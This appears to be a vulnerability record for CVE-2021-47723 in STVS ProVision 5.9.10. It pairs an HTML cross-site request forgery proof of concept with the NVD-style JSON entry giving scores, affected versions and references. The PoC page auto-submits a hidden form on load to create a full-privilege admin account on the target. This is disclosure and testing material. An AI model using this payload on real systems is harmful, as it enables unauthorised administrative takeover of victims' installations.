CVE-2021-47723

<!-- CSRF PoC for CVE-2021-47723: Create Admin User in STVS ProVision --> <!DOCTYPE html> <html> <head> <title>STVS ProVision CSRF Exploit - CVE-2021-47723</title> </head> <body> <h1>STVS ProVision CSRF Vulnerability Test</h1> <p>This page demonstrates the CSRF vulnerability in STVS ProVision 5.9.10</p> <!-- Auto-submit form to create admin user --> <form id="csrfForm" action="http://target:8080/api/admin/users" method="POST" style="display:none;"> <input type="hidden" name="action" value="create"> <input type="hidden" name="username" value="malicious_admin"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="role" value="admin"> <input type="hidden" name="privileges" value="full"> </form> <script> // Automatically submit the form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF exploit sent - Creating admin user'); </script> <p>If you see this message, the exploit may have been executed.</p> </body> </html>

{"cve": {"id": "CVE-2021-47723", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:50.770", "lastModified": "2026-02-17T20:36:44.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "STVS ProVision 5.9.10 contains a cross-site request forgery vulnerability that allows attackers to perform actions with administrative privileges by exploiting unvalidated HTTP requests. Attackers can visit malicious web sites to trigger the forge request, allowing them to create new admin users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "5C0F2D09-CDB3-4DAA-8C6A-1CFF4B5D2AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.6:*:*:*:*:*:*:*", "matchCriteriaId": "C75EA53C-2681-479C-B911-7CE5AEE00E69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.7:*:*:*:*:*:*:*", "matchCriteriaId": "A5EDCA0E-E4BF-4D4A-92D7-7433CC23A9EC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.8.6:*:*:*:*:*:*:*", "matchCriteriaId": "21131E39-42C6-43BC-8C53-7D4036D3B3AE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "807E2E4F-85FB-46AD-8ABF-12ECBF30047C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "5AC87B35-CCF1-43B8-9DB4-8C7D2BEF51FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.7:*:*:*:*:*:*:*", "matchCriteriaId": "83FEE9FC-3E43-47F1-BA35-2BB7C7DAA443"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.9:*:*:*:*:*:*:*", "matchCriteriaId": "D8BE45C5-7BD9-4853-99C9-D8969EB8FC94"}, {"vulnerable": true, "criteria": "cpe:2.3:a:stvs:provision:5.9.10:*:*:*:*:*:*:*", "matchCriteriaId": "495B9F3E-DD0F-4010-AE20-1A763AF04D7C"}]}]}], "references": [{"url": "http://www.stvs.ch", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49482", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://www.vulncheck.com/advisories/stvs-provision-cross-site-request-forgery-add-admin", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}